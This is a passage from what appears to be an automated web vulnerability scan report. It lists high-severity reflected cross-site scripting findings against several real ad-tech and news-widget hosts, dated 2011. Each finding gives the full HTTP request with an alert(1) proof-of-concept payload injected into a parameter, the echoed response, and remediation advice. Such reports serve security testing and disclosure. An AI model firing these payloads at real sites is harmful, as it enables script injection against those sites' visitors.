udm_0=MLv39SEJaSpn5l6paNmEREzM5uAjEsBEbZba7uQQIHoALYGisPLsFHhBzkvhsvoTAE9Wvh6ZCxNEguR8S2rPkq36I/Y42ALDUOFLsElUcIPk9fKtZgFPAifF96YUyd0oLw0n0Ryt05wdrN868QJ/+5QhhVDeoAuh30DL1Nhh9Cj6Z6bFYRSzXtL17j6Azv6OJ7vZk+tBc1rGGFfHZ8KvQqVAuPohuFqyL9DCTu4N0Gi+vRwD/rSPuL1I9buZQs2FTpssoPA2lbNTF5HywZMTMvEJzT0Zf2UCkxkv4eFl2m+vJ05v7cxXSZCytfEePc3AVcKePos/B6yGLnOnYNZSbct435ntIpmH+aMoQIO1EEBT/KbMs4hz185mDkHl9ZhQ39ljvZDokrGoTU36gJfTJZI/AqWc0s0Xmbv+pE9pw7ldj41i8wbXyTCypJvRY2Q6QpW/VxvJxSNMtuSsgJLL78oDV0r4PR7nI83zsUuOS3RTLGmoD3dqyR4OH4CVdFAjOC5c1c5gtOr1VVOjgkORQRxylxYzirxZwMyP6/DKD8ngoLSc1GRKtnJzMc/bI0l4AEBF/cQi4iDXo+iRxGlBQS15VZXhxq88Nq17eHWw9sEvQd1KJzj3TkOH5xiza3lfPjV8/CHorrK/+Knobbr3hxTR+CDzj6HH90GGT11M9it+1+QA5nWCEArmpXBdmF6CsdzcoC8OR+A2ZnIOw21PFvMOjPJ0Xl4ibJjWNuZLTuB1pifXet2MrhoPp1+fInzsdxtGeHmDvcCDU5EzIBOGhIw1ek72Dd+mmWJa7p78Egukc2SG4u/GfEFrBJvicafxIMcv0rhZ8jG4whpHITo1dongFFkobD4S8XLrx2FfETkMJiYku6qW2LdkVjWOWQhvIn8h6J78k9hHbKJ/8ZAg0J7tKUKeAUHjqFcYAEZH0H9DcwWmXwEcnQEbhb9TCWm/0ppaG1RDf1n+fu24/+jM7KvN/z7/7q0u56jH+YrYa3a+P1ge47W+os0pZiaDQpJH0htz1ZJ9klEG2dBtkl1cI3R0VAnabjV6XDJT9jTTZOg12FcQncz8373PU7Ej0JkBaKIJAHku50JX6LtJ/FgCiFkaBBhVLHZvlusvhSNrYDJHBvuC8L8qGa82X1lUTBV7rlrFEvpcBgBGilPpJasi; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 09 Apr 2011 12:29:31 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 10 Apr 2011 12:29:31 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:29:30 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "E05511220C2<SCRIPT>ALERT(1)</SCRIPT>ABFD15EFA4B" was not recognized.
*/
1.86. http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.foxnews/tier2_031010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 346c9'-alert(1)-'a49eed7e1c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.foxnews346c9'-alert(1)-'a49eed7e1c6/tier2_031010;sz=300x250;net=cm;ord=1302538878;env=ifr;ord1=280882;cmpgurl=? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582b; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:21:23 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 16:21:23 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 16:21:23 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Mon, 18-Apr-2011 16:21:23 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 00:21:23 GMT
Content-Length: 8003

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-40452658_1302538883","http://ib.adnxs.com/ptj?member=311&inv_code=cm.foxnews346c9'-alert(1)-'a49eed7e1c6&size=300x250&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.foxnews346c9%27-alert%281%29-%27a49eed7e1c6%2Ftier2_031010%3Bnet%3Dcm%3Bu%3D%2Ccm-40452658_1302538883%2C11f3c48b4c0582b%2Cnone%2
...[SNIP]...
1.87. http://lfov.net/webrecorder/g/chimera.js [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/g/chimera.js

Issue detail

The value of the vid request parameter is copied into the HTML document as plain text between tags. The payload 43832<img%20src%3da%20onerror%3dalert(1)>ac56b1b71cd was submitted in the vid parameter. This input was echoed as 43832<img src=a onerror=alert(1)>ac56b1b71cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /webrecorder/g/chimera.js?vid=null43832<img%20src%3da%20onerror%3dalert(1)>ac56b1b71cd HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Referer: http://www.ingeniux.com/solutions/website_optimization
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: LOOPFUSE="null43832<img src=a onerror=alert(1)>ac56b1b71cd"; Expires=Sun, 08-Apr-2012 00:18:53 GMT
Content-Length: 63
Date: Sat, 09 Apr 2011 00:18:53 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


_lf_vid='null43832<img src=a onerror=alert(1)>ac56b1b71cd';

1.88. http://nmp.newsgator.com/NGBuzz/buzz.ashx [_dsrId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The value of the _dsrId request parameter is copied into the HTML document as plain text between tags. The payload ac8c2<script>alert(1)</script>525de77e7b5 was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz/buzz.ashx?load=data&apiToken=291A707AAEE04CCC9A00B3B498001025&buzzId=216931&_dsrId=ngbuzz_216931_dataac8c2<script>alert(1)</script>525de77e7b5 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Last-Modified: Sat, 09 Apr 2011 12:09:30 GMT
ETag: 634379261703808200
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Cache-Control: public, max-age=300
Date: Sat, 09 Apr 2011 12:33:18 GMT
Connection: close
Content-Length: 1491

window.ng_scriptload({id:'ngbuzz_216931_dataac8c2<script>alert(1)</script>525de77e7b5',status:200,statusText:'200 OK',response:{Data:[{Description:'A Vermont legislative committee has give preliminary approval to a survey that establishes once and for all -- they think -- where St. Geo
...[SNIP]...
1.89. http://nmp.newsgator.com/NGBuzz/buzz.ashx [buzzId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The value of the buzzId request parameter is copied into the HTML document as plain text between tags. The payload c96c0<script>alert(1)</script>33816bc20bf was submitted in the buzzId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz/buzz.ashx?buzzId=216931c96c0<script>alert(1)</script>33816bc20bf&apiToken=291A707AAEE04CCC9A00B3B498001025 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Content-Type: text/javascript; charset=utf-8
Cache-Control: private, max-age=600
Date: Sat, 09 Apr 2011 12:29:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 102

//An error occurred: Could not find Buzz item with id: 216931c96c0<script>alert(1)</script>33816bc20bf
1.90. http://nmp.newsgator.com/NGBuzz/buzz.ashx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e7d35%3balert(1)//9227b469b76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e7d35;alert(1)//9227b469b76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NGBuzz/buzz.ashx?buzzId=216931&apiToken=291A707AAEE04CCC9A00B3B498001025&e7d35%3balert(1)//9227b469b76=1 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Last-Modified: Mon, 31 Jan 2011 21:21:01 GMT
ETag: 634320804615863350
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Cache-Control: public, max-age=600
Date: Sat, 09 Apr 2011 12:29:46 GMT
Connection: close
Content-Length: 11239

try{var buzzTemplate_216931="{if LoadScript(NGBaseUrl+\"HOST/\"+OrgCode+\"/js/jquery.min.js\", \"window.jQuery != null\") }\n{if location.hostname==\"hosted.newsgator.com\"}\n{eval}\n LoadCSS(\"http:
...[SNIP]...
6-2'},orgCode:'HATV',apiToken:'291A707AAEE04CCC9A00B3B498001025',name:'WPTZ - Home Page',buzzAppUrl:'http://nmp.newsgator.com/NGBUZZ/',buzzId:216931,directUrl:'http://hosted.newsgator.com/',extraArgs:{e7d35;alert(1)//9227b469b76:'1'},targetId:null});
           
           b._targetId = targetId;
           
           b.render();
       } else {
           setTimeout(function(){
               s();
           }, 50);
       }
   } catch(e){
       
   }
};
setTimeout(s, 1);
})();var bu
...[SNIP]...
1.91. http://pixel.adsafeprotected.com/jspix [anId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c2b8"-alert(1)-"845ae479775 was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=1405c2b8"-alert(1)-"845ae479775&pubId=5079&campId=3993 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:23 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=08823C762CB294BC2DF3AD18E0211AAB; Path=/
Connection: keep-alive
Content-Length: 8965


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a
...[SNIP]...
olitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=1405c2b8"-alert(1)-"845ae479775&pubId=5079&campId=3993",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="und
...[SNIP]...
1.92. http://pixel.adsafeprotected.com/jspix [campId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ca31"-alert(1)-"cf0726d3c5a was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140&pubId=5079&campId=39934ca31"-alert(1)-"cf0726d3c5a HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:23 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=36BC69FFFC71D2D1FFEF9321EAC627FB; Path=/
Connection: keep-alive
Content-Length: 8965


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a
...[SNIP]...
26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=5079&campId=39934ca31"-alert(1)-"cf0726d3c5a",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=A.INFO;}if(p
...[SNIP]...
1.93. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d8b9"-alert(1)-"d0025db5af8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140&pubId=5079&campId=3993&9d8b9"-alert(1)-"d0025db5af8=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:22 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9A8135652EFA0481F0614BB2AFFA2D7A; Path=/
Connection: keep-alive
Content-Length: 8968


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a
...[SNIP]...
6refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=5079&campId=3993&9d8b9"-alert(1)-"d0025db5af8=1",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=A.INFO;}if
...[SNIP]...
1.94. http://pixel.adsafeprotected.com/jspix [pubId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc52a"-alert(1)-"98c6f3dade1 was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140&pubId=5079bc52a"-alert(1)-"98c6f3dade1&campId=3993 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:22 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=945AF54FF3FD3C6E3DFC25EB4FF01A5D; Path=/
Connection: keep-alive
Content-Length: 8965


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a
...[SNIP]...
findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=5079bc52a"-alert(1)-"98c6f3dade1&campId=3993",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=
...[SNIP]...
1.95. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47500'%3balert(1)//51d2b9b58a7 was submitted in the admeld_callback parameter. This input was echoed as 47500';alert(1)//51d2b9b58a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match47500'%3balert(1)//51d2b9b58a7 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302539475030&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
